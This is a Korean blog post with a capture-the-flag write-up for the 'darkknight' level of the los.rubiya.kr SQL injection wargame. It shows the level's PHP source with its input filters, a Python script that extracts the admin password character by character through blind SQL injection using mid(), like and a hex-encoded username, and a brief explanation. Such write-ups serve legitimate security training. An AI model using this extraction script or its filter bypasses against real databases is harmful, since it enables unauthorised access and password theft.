일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | 5 | 6 | 7 |
8 | 9 | 10 | 11 | 12 | 13 | 14 |
15 | 16 | 17 | 18 | 19 | 20 | 21 |
22 | 23 | 24 | 25 | 26 | 27 | 28 |
29 | 30 | 31 |
- 인턴 후기
- EER
- 네이버 인턴
- jsp
- JSTL
- 인턴 지원
- Database
- DBMS
- mysql
- 행정지역 DB
- Django
- ㅁㅇㅂ??ㅇㅈㄷ ㅎㅇㅌ...
- 소프트웨어 개발보안 경진대회
- 정보보호병 후기
- Forensic 절차
- frontend
- spring
- riceteacatpanda
- 소개딩
- react
- 동읍면 DB
- 방명록 만들기
- Layered Architecture
- webhacking 처음
- PyAmdecoder
- 3단계 지역 DB
- SessionAttribute
- restapi
- reversing.kr
- 메모리 포랜식
- Today
- Total
웹찢남
Darkknight-writeup 본문
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~");
if(preg_match('/\'/i', $_GET[pw])) exit("HeHe");
if(preg_match('/\'|substr|ascii|=/i', $_GET[no])) exit("HeHe");
$query = "select id from prob_darkknight where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']) echo "<h2>Hello {$result[id]}</h2>";
$_GET[pw] = addslashes($_GET[pw]);
$query = "select pw from prob_darkknight where id='admin' and pw='{$_GET[pw]}'";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("darkknight");
highlight_file(__FILE__);
?>
import re
import requests
import time
flag = ''
length= 0
session =dict(PHPSESSID="자신의 PHPSESSION")
for i in range (1,20):
for j in range(48,128):
r=requests.post("https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php?no=11%20or%20id%20like%200x61646d696e%20and%20mid(pw,"+str(i)+",1) like "+chr(j)+"",cookies=session)
print(chr(j))
if 'Hello admin' in r.text:
flag=flag+str(chr(j))
print("finding pw: "+flag)
break
print("pw "+flag)
이번에도 blind sql injection인데 mid,like를 사용하고 그 전엔 id=guest이라는 구문이 있으므로
id like 'admin'을 넣고 쿼리를 날린다
'WEB_HACKING > los.rubiya.kr' 카테고리의 다른 글
Giant-writeup (0) | 2019.12.27 |
---|---|
Bugbear-writeup (0) | 2019.12.27 |
Golem-writeup (0) | 2019.12.27 |
Skeleton-writeup (0) | 2019.12.27 |
Vampire-writeup (0) | 2019.12.27 |